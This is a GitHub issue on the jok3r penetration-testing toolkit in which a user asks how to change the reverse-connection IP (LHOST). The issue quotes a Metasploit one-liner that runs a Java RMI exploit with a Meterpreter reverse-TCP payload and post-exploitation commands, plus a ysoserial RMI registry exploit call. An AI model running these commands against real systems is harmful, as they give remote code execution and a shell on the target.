Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How can change my Reverse IP for exploit attacks, There is shown Default 127.0.0.1 #39

Open
smileronin opened this issue Oct 25, 2019 · 0 comments

Comments

@smileronin
Copy link

Hi,
Firstly, thank you very much for your working , really it's very useful tool.

My question:
How can change my Reverse IP for exploit attacks, For.ex ;
I running the following command for a attack
python3 jok3r.py attack -m testDB -f "service=java-rmi" --fast

I see in the screen my reverse IP such as LHOST 127.0.0.1, I think So, this exploit could not doing connection.

_cmd> sudo msfconsole -q -x "use exploit/multi/misc/java_rmi_server; set RHOST 192.168.183.11; set RPORT 5001; set VERBOSE true; set LPORT 8443; set SRVPORT 9080; ; set PAYLOAD java/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 8443; set AutoRunScript multi_console_command -c getuid,ps,exit; exploit; sleep 2; exit"

cmd> ./run-ysoserial.sh ysoserial.exploit.RMIRegistryExploit 192.168.183.11 5001 Myfaces1 127.0.0.1_

How can do my eth0 interface IP to replacement as LHOST IP?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant